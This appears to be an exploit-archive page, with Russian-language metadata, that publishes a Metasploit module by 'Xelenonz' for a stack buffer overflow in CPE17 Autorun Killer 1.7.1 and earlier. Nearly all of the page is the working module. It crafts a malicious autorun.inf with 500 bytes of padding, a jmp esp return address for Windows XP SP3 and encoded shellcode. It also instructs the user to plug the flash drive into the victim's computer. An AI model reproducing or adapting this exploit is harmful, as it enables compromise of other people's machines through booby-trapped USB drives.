CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow Exploit

Свойства

Дата публикации:
26.04.2012
Цель:
CPE17 Autorun Killer <= 1.7.1
Тип воздействия:
Компрометация системы

Код

#
# CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
# by Xelenonz

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::FILEFORMAT

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
                        'Description'    => %q{
                                        readfile function is vulnerable it can be overflow  
                                             },
                        'Author'         => [ 'Xelenonz' ],
                        'Version'        => '0.1',
                        
                        'Payload'        =>
                                {
                                        'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
                                        'EncoderOptions' => {'BufferRegister'=>'ECX'},
                                },
            'DefaultOptions' =>
                                {
                                'DisablePayloadHandler' => 'true',
                                },
                        'Platform'       => 'windows',

                        'Targets'        =>
                                [
                                        [
                                            'Windows XP SP3',
                                                  {     'Ret' => 0x775a676f,
                                                      'Offset' => 500
                                                  }
                                       ],
                                      
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                            OptString.new('FILENAME',   [ true, 'The file name.',  'autorun.inf']),
                        ], self.class)
       end

       def exploit
             print_status("Encoding Payload ...")
          enc = framework.encoders.create("x86/alpha_mixed")
          enc.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
          hunter = enc.encode(payload.encoded, nil, nil, platform)
          buffer = ""
          buffer << "A"*target['Offset'] # padding offset
          buffer << [target.ret].pack('V') # jmp esp
          buffer << hunter # shellcode
          print_status("Creating '#{datastore['FILENAME']}' file ...")
          file_create(buffer)
          print_status("Plug flashdrive to victim's computer")
          handler
          
       end
end

или введите имя

CAPTCHA